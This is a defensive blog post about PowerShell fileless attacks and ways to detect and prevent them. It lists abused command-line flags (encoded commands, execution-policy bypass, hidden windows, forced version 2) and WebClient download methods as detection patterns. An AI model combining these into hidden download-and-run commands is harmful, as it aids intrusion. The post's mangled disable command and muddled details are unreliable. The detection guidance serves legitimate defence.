Blog

Understanding & Avoiding PowerShell Exploits

PowerShell is an inbuilt command-line tool which is incorporated on Windows operating devices. This in-memory software provides full access to system functions and can be used to execute commands, such as making downloads which are eventually run on the PC. This preinstalled and multipurpose Windows PowerShell has over time become an ideal candidate helping cyber criminals to gain entry to a target system and then laterally moving across to an organization’s entire network.

PowerShell attacks are based on fileless malware; that is, there is no need for a target to install any software from an attacker on the victim’s PC. PowerShell attacks utilize an OS (Windows 7, for example) inbuilt tool, for various malicious activities. Because this sort of attack doesn’t require any new software, coupled with limited techniques to tackle these forms of malware, it becomes difficult to detect the attacks as they keep growing. Some of the most dangerous attacks include PSAttackBuildTool, Offensive PowerShell, Nishang, etc. Between 2016 and ’17, the PowerShell malware attack grew by 432% and by about 661% in 2018. And in 2019, so far, it has already accounted for 57% of the total of attacks detected by IBM. These figures demonstrate the tremendous influence of attackers trying to penetrate people’s personal and cyberspace. Thus, making the knowledge of this malware important for everyone.

How Does it Happen?

Fileless malware gains access to a computer when users download codes or commands that are executable on their systems. Typically, it happens when people try to bypass a program like an antivirus or paid software so that they can use them free. The downloaded codes or files get executed and run on a computer, thereby giving access to the malware to take its place on a target location. The PowerShell, being a Windows trusted program does not get flagged as a system threat by a Windows Defender System or, as a matter of fact, check any scripts running through it. Attackers run their scripts on a computer when one downloads the compromised code, thereby giving them the access to go past the firewall. Some other times, attackers monitor operations to gain administrative control.

A whole enterprise environment runs the risk of exploitation even when just one computer in their whole network is compromised. In the event of an active and interactive PowerShell session attack, cyber criminals can gain a username and password, which paves way for even greater abuse. Since PowerShell commands can run from remote Windows computers, attackers can move across an organization’s network to gain access to confidential information or gain control over privileged accounts. The unavailability of software to instigate an attack and the fact that different PowerShell attack tools don't target the same location makes it difficult to detect and flush out an attacker from a system.

What can be done?

Upgrade Your PowerShell Version

Disabling updates is not the best thing to do as far as security measures are concerned; nor is patching a good option. The ideal prevention measure is to upgrade to the new and latest version, which contains improved features. Microsoft Windows PowerShell developers are doing great and the latest PowerShell version (5.X) is quite stable.

Disable Outdated Versions

After the upgrade, it will be necessary to disable the previous PowerShell engine. Improved Versions of Windows from 8 and above all have an optional feature to keep the installed PowerShell V2 engine on a computer and this can still cause downgrade attacks.

For newer versions of Windows OS down to Windows 8, you can execute the following command on your endpoint.

Disable -WindowsOptionalFeature -Online -FeatureNameMicrosoftWindowsPowerShellV2Root.

After this, with an Invoke-command, you can also enable ModuleLogging and ScriptBlockLogging.

Detection

One of the defensive protocols against PowerShell malware is to understand and detect its command lines. As stated, it can be extremely challenging to pin a PowerShell source. However, some command line parameters have been identified and considered notorious, and they include the following:

• -encoded: with the variation "-e", it allows a user to run an encoded code via PowerShell
• -ExecutionPolicy bypass: "-ep bypass, -exp bypass, -exec bypass" causes false positives and allows a bypass policy.
• -noprofile: "-nop" jumps loading profile.psi, thereby preventing logging.
• -windowStyle hidden: It creates false positives while preventing the running of a window.
• -version 2: "v2" enforces the version 2 of PowerShell.

Modules

During intensive scans, it is also great to look out for modules that are used to launch attacks. Common modules include .Net,Webclient, DownloadString, .DownloadFile, .Download. These modules can be monitored with enabled and enhanced module logging to disable unwanted scripts.

In conclusion, a PowerShell attack is a malware that requires no new source (file or software) to operate on a PC or network. It simply uses a Windows’ inbuilt OS to gain access past the firewall into a system. With breached password and username, it is possible to gain access into an entire network. It can be detected and prevented by current PowerShell updates and the uninstallation of previous versions or drive engines. ModuleLogging and ScriptBlockLogging, when enabled, also detect and prevent attacks. Most importantly, the use of third-party programs to bypass the security or entrance protocol to important software should be avoided.

Besides this, the proactive monitoring of your organization’s system and networks for any vulnerabilities or suspicious behavior can help security teams in detecting anomalies before the damage is done. Security analysts should incorporate Threat Intelligence as a part of their security mechanism to identify and prevent attacks. The adopting of a robust defense strategy against the growing threats can help avoid the risk of a compromise.